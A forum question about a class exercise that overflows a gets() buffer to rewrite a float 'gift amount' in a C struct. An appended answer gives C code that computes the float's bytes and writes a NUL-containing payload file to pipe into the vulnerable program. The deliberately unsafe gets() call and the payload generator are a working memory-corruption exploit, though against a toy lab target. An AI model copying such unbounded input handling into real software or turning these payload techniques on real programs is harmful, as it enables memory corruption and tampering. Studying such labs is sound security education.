I’ve got a strange assignment from a class in which I’m supposed to initiate a buffer overrun to see how easy it is for someone to take advantage of the gets() function.
The basic program that I’m given is this:
Code:
#include <stdio.h> // printf, gets
#include <conio.h> // getch (MSVC)
#include <tchar.h> // _tmain, _TCHAR (MSVC)

typedef struct student
{
char name[20]; // 20-byte name buffer, followed in memory by amount
float amount;
int other_stuff;
} person;

int _tmain(int argc, _TCHAR* argv[])
{
person p; // Create a person account (on the stack)
p.amount = 10.0; // set amount
printf("enter name: ");
gets(p.name); // get name (blindly ignoring buffer overrun; this is the intended flaw)
printf("Here is a $%6.2f gift for %s\n", p.amount, p.name);
getch(); // Wait for user to type <Enter> before quitting
return 0;
}
I understand that if I write more than 20 characters at the command prompt I will start writing into the area in memory where “amount” is located, so I can change it to anything that I want it to be. We are supposed to set the “amount” to 1,000,000, which I’ve figured out is 0x00 0x24 0x74 0x49 when arranged in memory. I know that I can hold down Alt and input the decimal equivalent of those numbers to overwrite memory, but I can’t get a NULL to work for my first byte.
In a perfect world I would use this NULL after I enter my name, then put in whatever I want up until I get to the amount area in memory and write in Alt 000, Alt 036, Alt 116, Alt 073. Unfortunately I can’t get Alt 000 to register, and I’m wondering if there is another way to put a NULL bit into the stream at a command prompt.
Does anyone have any ideas?
***EDIT***
I might be wrong on what I need to enter, as now, looking in my debugger, I see a different hex representation for 1,000,000: 0x00 0x50 0xc3 0x47.
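The usual way around the "can't type a NUL" problem is to not type the payload at all: write it to a file and redirect it into the program's stdin (prog < payload.bin), because gets() only stops at a newline or EOF, never at a NUL. The following is an added example, not code from the original post or the class assignment. It reuses the struct from the post, computes the little-endian byte pattern of any float (so both candidate byte sequences in the post can be checked against the value they actually encode), builds a payload that overwrites amount at its real offset inside the struct, simulates the unchecked copy that gets() performs, and writes the payload to a file. The payload file name and the name string "alice" are assumptions for illustration; the simulation assumes a little-endian host such as x86.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stddef.h>

/* Same layout as the post: name[20] is immediately followed by amount. */
typedef struct student {
    char name[20];
    float amount;
    int other_stuff;
} person;

/* Produce the little-endian in-memory byte pattern of a float (host-independent). */
void float_to_bytes(float f, unsigned char out[4]) {
    uint32_t bits;
    memcpy(&bits, &f, sizeof bits);          /* reinterpret without undefined behaviour */
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(bits >> (8 * i));
}

/* Build the overflow payload: name, NUL padding up to offsetof(amount), then the float.
 * Returns the payload length, or 0 if buf is too small. */
size_t build_payload(const char *name, float target, unsigned char *buf, size_t buflen) {
    size_t off = offsetof(person, amount);   /* 20 on MSVC/x86: no padding after name[20] */
    if (buflen < off + 4) return 0;
    memset(buf, 0, off);                     /* NUL-terminate the name; NULs are fine in a file */
    size_t n = strlen(name);
    if (n >= off) n = off - 1;               /* keep at least one NUL so %s prints cleanly */
    memcpy(buf, name, n);
    float_to_bytes(target, buf + off);       /* the 4 bytes that land on amount */
    return off + 4;
}

/* Model what gets() does to the stack object: copy input bytes with no bounds check.
 * Assumes a little-endian host so the payload bytes decode as the intended float. */
float simulate_overrun(const unsigned char *payload, size_t len) {
    person p;
    p.amount = 10.0f;                        /* the "$10 gift" before the overrun */
    if (len > sizeof p) len = sizeof p;      /* stay inside the object for this model */
    memcpy(&p, payload, len);                /* name[] fills first, then amount */
    return p.amount;
}

/* Write the payload plus a trailing newline (gets() stops at '\n', not at NUL). */
int write_payload_file(const char *path, const unsigned char *buf, size_t len) {
    FILE *f = fopen(path, "wb");
    if (!f) return -1;
    size_t w = fwrite(buf, 1, len, f);
    fputc('\n', f);
    fclose(f);
    return w == len ? 0 : -1;
}

int main(void) {
    unsigned char b[4];
    float_to_bytes(1000000.0f, b);
    printf("1000000.0f in memory: %02x %02x %02x %02x\n", b[0], b[1], b[2], b[3]);
    float_to_bytes(100000.0f, b);
    printf(" 100000.0f in memory: %02x %02x %02x %02x\n", b[0], b[1], b[2], b[3]);

    unsigned char payload[sizeof(person)];
    size_t n = build_payload("alice", 1000000.0f, payload, sizeof payload);
    printf("payload length %zu, amount after overrun: %.2f\n",
           n, simulate_overrun(payload, n));
    /* assumed file name; feed it to the target with: target.exe < payload.bin */
    return write_payload_file("payload.bin", payload, n);
}
```

Running the program prints the byte patterns and writes payload.bin; redirecting that file into the assignment binary delivers the NUL bytes that the Alt-keypad cannot. Check the printed pattern for 1000000.0f against the sequence you plan to send before trying it, since a float that decodes to a different magnitude looks identical in a hex view until you do the arithmetic.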